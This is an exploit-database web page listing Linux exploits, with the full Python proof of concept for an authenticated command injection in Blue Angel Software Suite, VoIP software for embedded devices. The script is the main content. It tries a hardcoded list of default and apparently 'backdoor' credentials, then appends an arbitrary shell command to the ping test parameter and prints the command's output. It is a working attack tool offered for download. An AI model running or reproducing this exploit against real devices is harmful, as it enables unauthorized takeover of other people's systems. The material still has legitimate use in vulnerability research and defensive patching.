Menu

Improved exploit search engine. Try it out

"Blue Angel Software Suite - Command Execution"

Author

"Paolo Serracino_ Pietro Minniti_ Damiano Proietti"

Platform

linux

Release date

2019-05-03

Release Date Title Type Platform Author
2019-05-08 "NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass" webapps linux MobileNetworkSecurity
2019-05-08 "MiniFtp - 'parseconf_load_setting' Buffer Overflow" local linux strider
2019-05-03 "Blue Angel Software Suite - Command Execution" remote linux "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-05-01 "CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting" webapps linux DKM
2019-04-30 "Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification" dos linux "Google Security Research"
2019-04-26 "systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process" dos linux "Google Security Research"
2019-04-23 "Linux - 'page->_refcount' Overflow via FUSE" dos linux "Google Security Research"
2019-04-23 "Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition" dos linux "Google Security Research"
2019-04-23 "systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit" dos linux "Google Security Research"
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-08 "CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting" webapps linux DKM
2019-04-08 "Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation" local linux cfreal
2019-03-29 "CentOS Web Panel 0.9.8.789 - NameServer Field Persistent Cross-Site Scripting" webapps linux DKM
2019-03-28 "gnutls 3.6.6 - 'verify_crt()' Use-After-Free" dos linux "Google Security Research"
2019-03-22 "snap - seccomp BBlacklist for TIOCSTI can be Circumvented" dos linux "Google Security Research"
2019-03-19 "libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons" dos linux "Google Security Research"
2019-03-11 "Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak" dos linux wally0813
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-06 "Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem" dos linux "Google Security Research"
2019-03-04 "FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)" dos linux "Mr Winst0n"
2019-03-01 "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module" dos linux "Google Security Research"
2019-02-28 "Usermin 1.750 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-28 "WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service" dos linux "Dhiraj Mishra"
2019-02-22 "Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation" webapps linux SecureAuth
2019-02-20 "MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates" dos linux "Google Security Research"
2019-02-21 "Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)" dos linux "Alejandra Sánchez"
2019-02-13 "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)" local linux embargo
2019-02-15 "Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference" dos linux "Google Security Research"
Release Date Title Type Platform Author
2019-05-03 "Blue Angel Software Suite - Command Execution" remote linux "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
2019-01-14 "Horde Imp - 'imap_open' Remote Command Execution" webapps php "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46792/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46792/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46792/41226/blue-angel-software-suite-command-execution/download/", "exploit_id": "46792", "exploit_description": "\"Blue Angel Software Suite - Command Execution\"", "exploit_date": "2019-05-03", "exploit_author": "\"Paolo Serracino_ Pietro Minniti_ Damiano Proietti\"", "exploit_type": "remote", "exploit_platform": "linux", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
# Exploit Title: Blue Angel Software Suite - Authenticated Command Execution
# Google Dork: N/A
# Date: 02/05/2019
# Exploit Author: Paolo Serracino 
# Vendor Homepage: http://www.5vtechnologies.com
# Software Link: N/A
# Version: All
# Tested on: Embedded Linux OS
# CVE : N/A
# Description: Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services is vulnerable to an authenticated 
# command execution in ping command. All default accounts can be used to login and achieve command execution, including the guest one. 
# Moreover there's another account, defined in the local file device.dat, that provides an apparently "backdoor" account.
# A list of these accounts is hardcoded in the script.

#/usr/bin/python
import sys
import requests


def check_sw(target,port):

  res = requests.get(target + ':' + port)

  if '/cgi-bin/webctrl.cgi?action=index_page' in res.text:
     return True
  else:
     print "[-] DOES NOT LOOK LIKE THE PAGE WE'RE LOOKING FOR"
     return False

def check_login(target,port,command):

   if not check_sw(target,port):
      sys.exit()

   creds_common = [('blueangel','blueangel'), #the "backdoor" account
                   ('root','abnareum10'),
                   ('root','Admin@tbroad'),
                   ('root','superuser'),
                   ('user','user') ,
                   ('guest','guest'),
                   ]
 
   for i in range(len(creds_common)):
      postdata=[('action','login_authentication'),
               ('redirect_action','sysinfo_page'),
               ('login_username',creds_common[i][0]),
               ('login_password',creds_common[i][1]),
               ('B1','Login')
               ]

      res = requests.post(target + ':' + port + '/cgi-bin/webctrl.cgi',data=postdata)

      if 'Set-Cookie' in res.headers:
         cookie = res.headers.get('Set-Cookie')
         print '[+] LOGGED IN WITH CREDENTIALS  ' + str(creds_common[i][0] + ' : ' + creds_common[i][1]) 
         execute_cmd(target,port,cookie,command)  
         return True


def execute_cmd(target,port,cookie,cmd):

   print '[+] EXECUTING COMMAND'
   new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
                 'Referer': target,
                 'Cookie': cookie
                })
   res = requests.get(target + ':' + port + '/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1;' + cmd + '&B1=PING',headers=new_headers)
   res_lines = res.text.splitlines()
   result = []
   copy = False

   for line in res_lines:

      if 'round-trip min/avg/max' in line:
         copy = True
      elif '</pre></body></html>' in line: 
         copy = False
      elif copy == True:
         result.append(line)

   print('[+] COMMAND RESPONSE')
   print('------------------------------------------')

   for r in result:
      print r
   print('------------------------------------------')


def main():

   if len(sys.argv) < 4:
      print '[-] 3 ARGS: TARGET PORT SHELL_COMMAND'
      sys.exit()
   
   target = sys.argv[1]   
   port = sys.argv[2]
   command = sys.argv[3]
   if not check_login(target,port,command):
      print '[-] COULD NOT FIND VALID CREDENTIALS'
      
if __name__ == "__main__":
    main()